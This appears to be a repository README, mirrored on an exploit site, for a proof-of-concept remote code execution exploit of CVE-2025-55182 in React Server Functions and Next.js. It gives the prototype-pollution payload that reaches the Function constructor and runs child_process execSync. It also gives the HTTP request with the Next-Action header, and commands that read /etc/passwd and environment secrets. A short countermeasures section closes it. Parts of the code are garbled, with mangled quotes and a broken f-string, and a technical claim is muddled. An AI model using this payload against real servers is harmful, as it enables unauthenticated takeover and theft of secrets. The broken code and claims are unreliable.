Share
## https://sploitus.com/exploit?id=221A3D9E-872F-55D3-B6C5-C8646FC9FC6B
# CVE-2025-55182

This is the exploit code for a **Remote Code Execution (RCE) vulnerability** in React Server Functions (such as Next.js). It exploits prototype pollution to execute arbitrary code on the server without authentication. > **Note**: This repository is for educational and research purposes only. Use at your own risk.

## Overview

### Affected Versions
- **Next.js**: Before 16.0.6 (vulnerable)
- **React**: Before this commit ([https://github.com/facebook/react/pull/35277/commits/e2fd5dc6ad973dd3f220056404d0ae0a8707998d](https://github.com/facebook/react/pull/35277/commits/e2fd5dc6ad973dd3f220056404d0ae0a8707998d))**

### Severity of the Vulnerability
- **CVSS**: High (detailed score not published)
- **Attack Difficulty**: Low (can be exploited with a single HTTP request without authentication)
- **Impact**: Execution of arbitrary code on the server

### Cause of the Vulnerability
The vulnerability arises from improper validation of the prototype chain during the deserialization process of the React Flight Protocol. This allows access to the `Function` constructor through `__proto__`, enabling the execution of arbitrary JavaScript code.

## How to Use

### Docker Environment (Recommended)

This is the simplest way to test the vulnerability.
```bash
# 1. Start the vulnerable Next.js server
docker compose up -d --build

# 2. Run the exploit (default: id command)
docker compose run --rm poc

# 4. Run custom commands
docker compose run --rm -e COMMAND="whoami" poc
docker compose run --rm -e COMMAND="cat /etc/passwd" poc
docker compose run --rm -e COMMAND="env" poc

# 5. Stop the server
docker-compose down
```

## Technical Explanation

### 1. Prerequisites

#### What are React Server Functions?
They are server-side API functions provided by Next.js and others. Example:
```typescript
// Server Action (function executed only on the server side)
async function submitForm(formData) {
  'use server'  // Declaration of the server function
  
  // Server-side processing, such as database operations
  const result = await db.insert(formData)
  return result
}
```

When called from the client, it sends an HTTP request to the server. The request’s parameters are serialized/deserialized using the React Flight Protocol. The server then executes the function and returns the result to the client.

#### How does the React Flight Protocol work?
The client sends data in units called “chunks”:
```python
files = {
    "0": (None, '["$1"]'),                                  # Chunk 0: Reference to Chunk 1
    "1": (None, '{"object":"fruit","name":"$2:fruitName"}'), # Chunk 1: References fruitName in Chunk 2
    "2": (None, '{"fruitName":"cherry"}'),                  # Chunk 2: Actual data
}
```

On the server side, these chunks are deserialized into:
```javascript
{ object: 'fruit', name: 'cherry' }
```

The key point is that references between chunks are possible.

### 2. Details of the Vulnerability

#### Problem
In commits before [this specific commit](https://github.com/facebook/react/pull/35277/commits/e2fd5dc6ad973dd3f220056404d0ae0a8707998d), there was no check to ensure that the keys actually existed in the objects. This allowed access to the prototype chain. #### Basic Exploitation (Accessing the Function Constructor)

```python
files = {
    "0": (None, '["$1:__proto__:constructor:constructor"]'),
    "1": (None, '{"x":1}'),
}
```

The reference resolution process:
```
Chunk 1’s object → __proto__ → constructor → constructor → Function
```

Result:
```javascript

[Function: Function]  // Obtained the Function constructor!

“reason”: -1,  # To prevent errors when using toString()
“value”: ‘{"then":“$B0"}’,  # Setting then using blob reference
“_response”: {
    “_prefix”: “process.mainModule.require('child_process').execSync('calc');”,
    “_formData”: {
        “get”:“$1:constructor:constructor”,  # Function constructor
    },
}

files = {
    “0”: (None, json.dumps(crafted_chunk)),
    “1”: (None,“‘$@0’”),
}

**Execution Flow:**
response._formData.get(response._prefix + “0”)
↓
Function(“process.mainModule.require('child_process').execSync('calc');0”)
↓
// This function is called after awaiting → Code execution!

---

### 4. PoC’s Operation
`poc.py` implements the above payload and extracts command execution results from error messages:

```python
# Embed command output into the error digest field
“_prefix”: f“var res = process.mainModule.require('child_process').execSync({‘EXECUTABLE’:{{‘timeout’:5000}}}).toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'), {{digest:‘${{res}}`}});”
```

By setting “Next-Action: x” in the HTTP header, the attack becomes effective:

```python
headers = {"Next-Action": "x"}
res = requests.post(BASE_URL, files=files, headers=headers)
```

**Important:** This attack occurs during **deployment**, so it is executed before action validation (`getActionModIdOrError`). ---

## Countermeasures
### For Developers
1. **Update immediately**: Update React and Next.js to the latest versions.
   ```bash
   npm update react react-dom next
   ```

2. **Version Verification**:
   ```bash
   npm list react next
   ```
   - Next.js 16.0.7 and later
   - React 19.2.1 and later (including corrected commits)

3. **WAF/Security Measures**:
   - Monitor “Next-Action” headers
   - Block abnormal form data

### Vulnerability Scan
```bash
# Check project vulnerabilities
npm audit
```

---

## References
1. [React Server Functions Official Documentation](https://react.dev/reference/rsc/server-functions)
2. [Understanding React Flight Protocol](https://tonyalicea.dev/blog/understanding-react-server-components/)
3. [Corrected Commits](https://github.com/facebook/react/pull/35277/commits/e2fd5dc6ad973dd3f220056404d0ae0a8707998d)
4. [JavaScript Object Prototypes Explanation](https://developer.mozilla.org/ja/docs/Learn/JavaScript/Objects/Object_prototypes)
5. [Function Constructor](https://developer.mozilla.org/ja/docs/Web/JavaScript/Reference/Global_Objects/Function/Function)
6. [Discoverer: maple3142](https://x.com/maple3142)

---

## Licenses and Terms of Use
This repository is provided **only for educational and research purposes**. - Using it on third-party systems without permission is illegal.
- The creator does not assume any responsibility for any damages caused by its use.
- Please use this tool with caution.

---

## Contributions
Vulnerability discovery: [maple3142](https://x.com/maple3142)
PoC implementation: The creator of this repository

[source-iocs-preserved method=response._formData.get(response._prefix + "0"),response._formData.get(response._prefix + obj)]